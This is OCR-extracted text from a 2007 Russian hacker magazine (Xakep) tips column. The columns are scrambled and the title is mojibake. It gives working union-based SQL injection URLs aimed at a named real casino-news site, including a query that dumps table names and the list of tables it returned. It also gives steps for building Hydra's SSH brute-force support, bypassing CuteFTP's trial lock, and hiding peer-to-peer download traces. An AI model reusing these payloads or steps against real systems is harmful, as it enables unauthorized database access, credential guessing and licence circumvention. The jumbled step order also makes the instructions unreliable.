ÃÂÃÂ¾Ã‘ÂÃÂ±Ã‘Â€Ã‘ÂŒ - Xakep Online

More documents

Recommendations

Info

взлом 4. Переходим в извлеченный каталог: $ make install $ cd libssh-0.1 6. Копируем исошник в /usr/lib: 5. Приступаем к сборке: $ cp /usr/local/lib/libssh.so /usr/lib/ $ ./configure $ make 7. Инсталлируем и запускаем Гидру. Теперь брут по SSH будет работать :). №5 Разблокировка окна CuteFTP 8 при помощи InqSoft WindowScanner Задача: поработать с FTP-клиентом CuteFTP 8, у которого истек демонстрационный срок. Решение: Как известно, при попытке запуска после истечения триала CuteFTP выдает окошко-наг, в котором присутствуют две кнопки: Enter Serial Number и Close. Попробуем обойти это досадное ограничение. 1. Основная программа инициализировалась в памяти, ведь наг выведен на фоне окна FTP-клиента. Для того чтобы поработать с программой, придется каким-то образом получить доступ к заблокированному окну. Прибегнем к помощи InqSoft WindowScanner. Запускаем его. Используя инструмент «Прицел», выделяем основное окно программы CuteFTP. 2. Нажимаем на кнопку «Управление» для вывода на экран панели управления активным окном. Она тут же появится в нижней части окна программы. Из всех кнопок этой панели нас интересует одна — кнопка «Окно активно» (по счету она седьмая слева). Жмем ее и... готово! Окно CuteFtp теперь доступно, с программой можно работать. 3. Навязчивый наг на время работы можно убрать путем выделения его окошка инструментом «Прицел» и нажатия на кнопку «Окно видимо» на панели управления окнами. Альтернатива: Существует пакет Sign of Misery (s0m.narod.ru) от той же конторы, который обладает возможностью написания несложных скриптов. С его помощью можно выполнять еще более изощренные вещи, обладая лишь базовым набором знаний и не владея отладчиком и другими крякерскими тулзами! №6 http://www.onlinecasinoreports.com/news_show_cat. asp?cat=1%27 2. Подбираем количество полей: http://www.onlinecasinoreports.com/news_show_cat. asp?cat=1%27+union+select+1,2,3-- Составляем кверю вида: Выдираем список таблиц из БД Задача: извлечь таблицы и поля из MSSQL при наличии SQL-инъекции. Решение: Давай разберемся в ситуации на конкретном примере. Как ты знаешь, в мускуле в большинстве случаев названия таблиц в базе приходится либо подбирать ручками, либо брутить специально предназначенным для этого софтом. Исключение составляет лишь MySQL пятой версии (и ниже), в котором так же, как и в MSSQL, есть очень полезная для нас с тобой база под названием information_schema. В ней содержится информация о названии всех таблиц и полей, хранящихся в СУБД. Причем обратиться с запросом к БД information_schema может любой юзер СУБД независимо от прав доступа. Так что будем действовать согласно следующему плану: 1. Посмотрим, как все вышеизложенное работает на практике. Берем заведомо уязвимый ресурс: 048 http://www.onlinecasinoreports.com/news_ show_cat.asp?cat=1%27+union+select+1,table_ name,3+from+information_schema.tables-- 3. В качестве ответа получаем список всех доступных табличек: ... ADMIN_LOGIN_ATTEMPTS archive bnr_banner_types bnr_banners BNR_VIEWD_BANNER_LOGS BNR_VIEWD_BANNER_LOGS_SUMMARY BRANDS CATEGORIES ... 4. Радуемся, поскольку в этом случае нам повезло. MSSQL вернул нам все и сразу :). Обычно в запросах приходится использовать конструкцию top, которая является убогим аналогом limit’а в мускуле. xàêåð 11 /107/ 07
взлом №7 Анонимность в пиринговых сетях — залог спокойствия :) Задача: незаметно и безопасно качать файлы из пиринговых сетей с помощью DC++. Решение: Для примера возьмем одну из файлообменных пиринговых (peer-to-peer) сетей и рассмотрим настройки ее клиента. Direct Connect — это пиринговая сеть, в основе работы которой лежит файлообменный протокол, разработанный фирмой NeoModus. Прог для работы с этими сетями написано много, у большинства из них открытый код. Но, несмотря на их большое разнообразие, все они похожи, так как являются доработанными версиями одного из самых первых клиентов для сетей Direct Connect — DC++. Таким образом, у всех клонов DC++ будут схожие настройки. 1. Защищаемся носками :). Последние версии DC++ поддерживают работу с Socks 5. Запускаем DC++, открываем «File Settings». В появившемся меню выбираем Connection Settings. Переставляем переключатель на самый нижний пункт SOCKS5, после чего нам дают возможность вбить IP сокса (Socks IP), порт (Port), логин (Username) и пароль. Ни для кого не секрет, что отыскать бесплатный сокс несложно, но тут стоит задуматься о скорости закачки. Не забываем также проверить, поставлена ли галочка напротив Use SOCKS5 server to resolve hostnames («Использовать сервер SOCKS5 для обработки хостов»). 2. Усиливаем защиту. В этом же окошке Settings выбираем Advanced. Перед нами список дополнительных настроек DC++, где включенные опции помечены галочками. Проверяем наличие галочки напротив «Enable safe and compressed transfers» («Разрешить защищенные передачи и передачи со сжатием»). Таким образом повышаем безопасность и скорость передачи файла. Если галочка не поставлена по умолчанию, ставим. Далее снимаем галочку с опции «Add finished files to share instantly», то есть запрещаем добавлять скачанные файлы в шару. Тем самым мы убираем от посторонних глаз полученные файлы у себя на компе. Осталось сделать пару штрихов, чтобы устранить всякое присутствие следов закачки. Отключаем опцию «Don’t delete file lists when exiting». После выключения DC++ все скачанные файл-листы (списки расшаренных файлов удаленного пользователя) будут автоматически стираться. По умолчанию они сохраняются в папку FileLists в рабочем каталоге DC++. Последней нашей настройкой будет отключение логирования закачек. Для этого перейдем в «File Settings Logs» и снимем галочку с пункта Log downloads. 3. Меры по защите приняты. Теперь можно безопасно скачивать нужную инфу. №8 Переведенный на русский язык заголовок окна плеера 1by1 Задача: перевести на русский язык текстовую строку в модной программе The Directory Player. Решение: Для примера возьмем строку «1by1 » в заголовке окна миниатюрного плеера 1by1. 1. Открываем файл в шестнадцатеричном редакторе WinHex. 2. В меню выбираем «Search Find Text». 3. В поле поиска вводим: «1by1 — The Directory Player», в поле кодировки выбираем ASCII (довольно часто строки хранятся именно в этой кодировке). xàêåð 11 /107/ 07 4. Строчка «1by1 — The Directory Player» встречается в программе несколько раз (это можно проверить, продолжив поиск по ), поэтому придется перевести все ее вхождения. Как это делается? Заменить строку русским аналогом («Суперпроигрыватель» :)) проще всего путем редактирования в окне ASCII-дампа (справа от области шестнадцатеричного дампа), забив лишние байты пробелами. После замены сохраняй файл и смотри на плоды своего труда. Если ты имеешь дело со строкой в кодировке Unicode, то все немного сложнее. Как ты заметил, каждый символ в Юникоде кодируется двумя байтами, причем в случае символов английского алфавита второй байт является нулевым. В такой ситуации заменяй символы, не трогая нулевые байты (они отображаются точками). Альтернатива: Если ты опасаешься навороченности и сложности WinHex, можно воспользоваться любым редактором ресурсов, например Restorator (www.bome. com/Restorator/download.html) или же простейшим ResHack (www.toksin. ru/prog/ut/ResHacker.exe). Вот пример того, как выполнить нашу задачу, используя утилиту Restorator. 1. Открываем распакованный файл. 2. Выбираем из иерархического древа узел «Dialog -> 200» (в других версиях номер ресурса может быть и не 200, все зависит от версии программы; главное — отыскать в подпапке Dialog форму, представляющую собой основное окно программы с заголовком «1by1 — The Directory Player»). 3. Нажимаем кнопку Edit Mode (или клавишу ) для редактирования нашего ресурса. 4. В поле Caption вводим перевод нашей строки. Далее выбираем «File Save As», подтверждаем изменения и сохраняем файл под другим именем. P.S. Незарегистрированная версия Restorator делает вышеописанное криво, вдобавок дополняя все заголовки окон ссылками на сайт своего производителя. Так что лучше либо разжиться регистрацией, либо пользоваться ResHack (он бесплатен). z 049
Page 1: ж у р н а л о т к о м п
Page 4 and 5: MEGANEWS 004 MegaNews Все нов
Page 6: meganews Meganews Дмитрий т
Page 10: meganews Финансовые ре
Page 14 and 15: meganews За найденный н
Page 16 and 17: meganews Скайпофон, род
Page 18 and 19: ferrum Кирилл Аврорин
Page 20: ferrum $740 $500 Samsung SyncMaster
Page 24 and 25: ferrum Игорь Федюкин К
Page 26: ferrum функцией StreamEngin
Page 29 and 30: ferrum $295 4. Zalman Theatre 6 ZM-
Page 32 and 33: pc_zone Крис КасперсКи
Page 34 and 35: pc_zone Вполне привычн
Page 36: pc_zone старого железа
Page 39 and 40: pc_zone Внимание! Идет
Page 42: pc_zone Лично я подклю
Page 45 and 46: pc_zone Эта программа
Page 47 and 48: pc_zone Рассмотрим про
Page 49: взлом Cookie: $QUERY_STRING\n
Page 53 and 54: взлом Крэш Outlook Express
Page 55 and 56: взлом Распаковка msx
Page 58 and 59: взлом Крис Касперс
Page 60 and 61: взлом Случайно выб
Page 62: взлом Лучшие игры с
Page 65 and 66: взлом Отсюда можно
Page 67 and 68: «Кушаем» память, чт
Page 69 and 70: взлом драйвера дей
Page 71 and 72: взлом (limit 0, 1, затем
Page 73 and 74: взлом locked login password pa
Page 75 and 76: взлом пропускают н
Page 77 and 78: взлом Скрин Комбин
Page 80 and 81: взлом Gasoid «Stefun» Rich /
Page 82: взлом Внешний вид Mo
Page 85 and 86: взлом будет радова
Page 87 and 88: сцена s Apple Apple Lisa Ле
Page 89 and 90: сцена Microsoft Bob, запу
Page 91 and 92: сцена Apple только чт
Page 93 and 94: сцена X-Profile Мария «M
Page 95 and 96: unixoid Утилита lsusb поз
Page 97 and 98: unixoid Проверяем файл
Page 100 and 101:
unixoid Владимир «turbina
Page 102:
unixoid Бестиковая сис
Page 105 and 106:
unixoid Использование
Page 107 and 108:
unixoid Мне обзор понр
Page 110 and 111:
coding Игорь Антонов /
Page 112 and 113:
coding Тестируем регу
Page 114:
coding Получаем тольк
Page 117 and 118:
Включаем ASLR ясен уж
Page 119 and 120:
00401006 mov eax,dword ptr [___secu
Page 122 and 123:
coding Крис Касперски
Page 124 and 125:
phreaking C Di Halt / di_halt@mail.
Page 126 and 127:
conTro >> phreaking Инструм
Page 128 and 129:
ONTRO >> phreaking Принципи
Page 130 and 131:
phreaking Чорт / zzzuhell@mail.
Page 132 and 133:
phreaking links http://wii.nintendo
Page 134 and 135:
units Степан «Step» Иль
Page 136:
units XP с подключение
Page 139 and 140:
units Рис.2. «Бливет»
Page 141 and 142:
units Рис.7. Треугольн
Page 143 and 144:
x № 11(107) ноябрь 2007 >>W
Page 145 and 146:
ВЫГОДА ГАРАНТИЯ СЕ
Page 147 and 148:
Хакер.Pro Редактор г
Page 149 and 150:
ХАКЕР.PRO Мастер RSoP У
Page 151 and 152:
Хакер.Pro Рис.1. Диспе
Page 153 and 154:
ХАКЕР.PRO Рис.5. «Мони
Page 155 and 156:
Хакер.Pro Пакеты Ubuntu
Page 157 and 158:
ХАКЕР.PRO ztdummy 6184 0 zapte
Page 159 and 160:
ХАКЕР.PRO Дисковая п
Page 161 and 162:
ХАКЕР.PRO • более вы
Page 165:
2007 x 11(НОЯБРЬ)07 107 WE AR
show all

ÃÂÃÂ¾Ã‘ÂÃÂ±Ã‘Â€Ã‘ÂŒ - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

ÃÂÃÂ¾Ã‘ÂÃÂ±Ã‘Â€Ã‘ÂŒ - Xakep Online